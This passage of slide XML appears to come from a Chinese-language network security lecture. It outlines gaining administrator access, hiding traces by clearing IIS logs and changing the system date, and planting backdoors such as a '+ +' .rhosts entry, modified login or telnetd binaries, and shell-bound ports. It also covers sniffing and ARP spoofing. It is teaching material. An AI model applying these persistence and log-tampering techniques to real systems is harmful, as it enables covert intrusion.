      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）获得管理员口令；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）利用系统管理安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如错误的文件访问权、错误的系统配置、某些缓冲区溢出漏洞；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）使用特洛伊木马窃取管理员口令。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168962" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>获取目标主机的管理权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{54F58422-2144-499E-9DB9-CCDC7A8CDE6D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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9" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>清除日志、删除拷贝的文件等手段来隐藏自己的踪迹。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进程隐藏、连接隐藏以及改变系统时间造成日志文件紊乱等方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问日志位置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WinDir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>LogFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\W3SVC1\exyymmdd.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改写日志的技巧</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改系统日期</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>删除中间文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>删除创建的用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐藏自己的行踪</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88079EE2-F6F2-4C8A-97CB-36FB1CC23156}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门可以作什么</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方便下次直接进入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>监视用户所有行为、隐私</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>完全控制用户主机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门放置方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果已经入侵</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>添加用户、修改登录程序、修改配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>添加用户到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门：添加字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘+ +’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，以便通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rlogin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进入系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门：修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登陆程序，以便使用特定的后门密码，随意用户名获得指定用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进程后门：修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>in.telnetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，以便使用指定的终端类型获得访问权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务后门：绑定一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到指定端口（后门服务），使用后门服务替换新的网络服务或未使用的旧服务；以便通过后门服务获得访问权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果尚未入侵</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用系统漏洞，远程植入或诱骗执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136195" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后门</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方便下次进入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30465279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网络接口层安全威胁</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议各层安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58370"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9A46C95-1AEB-49D4-AF17-D726431B01BD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1788725627"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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以太网协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSMA/CD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信道共享方式传送数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络监听</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议的安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>​ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存可能被毒害</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>链路层协议的安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3775453823"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监视网络的流量、状态、数据等信息，分析数据包，获得有价值的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>口令、帐号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>机密或敏感数据、信息（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>e-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内容）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流量信息：窥探低级的协议信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>双刃剑</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理工具：实时观测分析数据包，从而进行网络故障定位</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息收集工具：攻击者们常用的收集信息工具 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络监听（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>） </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B8C09CEF-22E6-42C2-A55F-8E359C4B6999}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3650695108"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>资源及其脆弱性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Resources and their Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脆弱性及攻击（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Vulnerability  and Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全威胁（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Security Threats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其他分类方法</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3503181361"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>共享式网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HUB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接网络</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交换式网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过交换机连接网络</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224258" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络环境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F2D48847-E646-4119-8C61-53E41934E92F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2513424655"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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
          <p:cNvSpPr>
